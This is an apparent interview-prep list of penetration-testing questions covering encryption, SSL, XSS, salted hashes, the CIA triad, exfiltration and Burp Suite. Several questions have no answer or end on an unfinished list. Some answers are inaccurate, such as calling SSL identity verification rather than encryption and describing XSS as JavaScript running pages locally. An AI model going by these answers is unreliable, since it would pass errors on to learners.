VAPT Interview Questions
1.What is a specific definition of pentesting?
Penetration testing is an authorized and controlled security assessment in which ethical hackers simulate real-world cyberattacks on systems, networks, or applications to identify vulnerabilities that could be exploited by malicious attackers.
2.What is the primary purpose of pentesting?
The main purpose of a pentest is to conduct a “deep dive” into the IT Infrastructure of a business or a corporation with the primary intention of gaining access to any (and if possible, all) of the electronic based assets that exist. It is important to note that the goal of the pentester is not to attempt to strike a hard blow right at the very beginning; rather, they escalate the intensity of the cyber-attack over a period of time.
3.What are the goals of conducting a pentesting exercise?
4.There is very often confusion between vulnerability testing and pentesting. What is the primary difference between the two?
5. What are the teams that can carry out a pentest? Describe them.
The teams that can carry out a penetration test are Red Team, Blue Team, and Purple Team.
6. What’s the difference between symmetric and asymmetric encryption?
To boil down an extremely complicated topic into a few short words, symmetric encryption uses the same key to encrypt and decrypt, while asymmetric uses different keys for encryption and decryption. Symmetric is usually much faster, but is difficult to implement most times due to the fact that you would have to transfer the key over an unencrypted channel. Therefore many times an asymmetric connection will be established first, then create the symmetric connection.
7. What is SSL and why is it not enough when it comes to encryption?
SSL is identity verification, not hard data encryption. It is designed to be able to prove that the person you are talking to on the other end is who they say they are. SSL and its big brother TLS are both used almost everyone online, but the problem is because of this it is a huge target and is mainly attacked via its implementation (the Heartbleed bug for example) and its known methodology. As a result, SSL can be stripped in certain circumstances, so additional protections for data-in-transit and data-at-rest are very good ideas.
8. What is XSS?
Cross-site scripting is the nightmare of Javascript. Because Javascript can run pages locally on the client system as opposed to running everything on the server side, this can cause headaches for a programmer if variables can be changed directly on the client’s webpage. There are a number of ways to protect against this, the easiest of which is input validation.
9.What are salted hashes?
Salt at its most fundamental level is random data. When a properly protected password system receives a new password, it will create a hashed value for that password, create a new random salt value and then store that combined value in its database. This helps defend against dictionary attacks and known hash attacks. For example, if a user uses the same password on two different systems, if they used the same hashing algorithm, they could end up with the same hash value. However, if even one of the systems uses salt with its hashes, the values will be different.
10. What is data protection in transit vs data protection at rest?
When data is protected while it is just sitting there in its database or on its hard drive — it can be considered at rest. On the other hand, while it is going from server to client, it is in-transit. Many servers do one or the other — protected SQL databases, VPN connections, etc. However, there are not many that do both, primarily because of the extra drain on resources. It is still a good practice to do both. Even if it does take a bit longer.
11. How do you protect your home wireless access point?
This is another opinion question. There are a lot of different ways to protect a wireless access point: using WPA2, not broadcasting the SSID and using MAC address filtering are the most popular among them. There are many other options, but in a typical home environment, those three are the biggest.
12. What is the CIA triangle?
Confidentiality, integrity, availability. As close to a “code” for information security as it is possible to get, it is the boiled down essence of InfoSec. Confidentiality is keeping data secure. Integrity is keeping data intact. Availability is keeping data accessible.
13. What’s the difference between a white box test and a black box test?
The difference is information given by the person commissioning the test. A white box test is one where the pentesting team is given as much information as possible regarding the environment, while a black box test is … well … a black box. They don’t know what’s inside.
14. What is the chain of custody?
When keeping track of data or equipment for use in legal proceedings, it needs to remain in a pristine state. Therefore, documenting exactly who has had access to what for how long is vital when dealing with this situation. Any compromise in the data can lead to legal issues for the parties involved and can lead to a mistrial or contempt depending on the scenario.
15. What is exfiltration?
Infiltration is the method by which you enter or smuggle elements into a location. Exfiltration is just the opposite: getting sensitive information or objects out of a location without being discovered. In an environment with high security, this can be extremely difficult but not impossible. Again we turn to our friends in the fake delivery uniforms wandering around the building, and see that, yes, there are ways to get in and out without a lot of issues.
16. What are the hacking stages? Explain each stage
Hacking, or targeting a specific machine, should follow and go through the following five phases:
17. What is scanning and what are some examples of the types of scanning used?
Scanning may be referred to as a set of procedures for identifying hosts, ports and the services attached to a network. Scanning is a critical component for information gathering. It allows the hacker to create a profile on the site of the organization to be hacked. Types of scanning include:
18. What is footprinting? What are the techniques used for footprinting?
Footprinting refers to accumulating and uncovering information about the target network before attempting to gain access. Hacking techniques include:
19. What are some of the standard tools used by ethical hackers?
To facilitate some manual tasks and speed up the hacking process, hackers can use a set of tools such as:
20. What is Burp Suite? What tools does it contain?
Burp Suite is an integrated platform used for attacking web applications. It contains all the possible tools a hacker would require for attacking an application. Some of these functionalities include, but are not limited to:
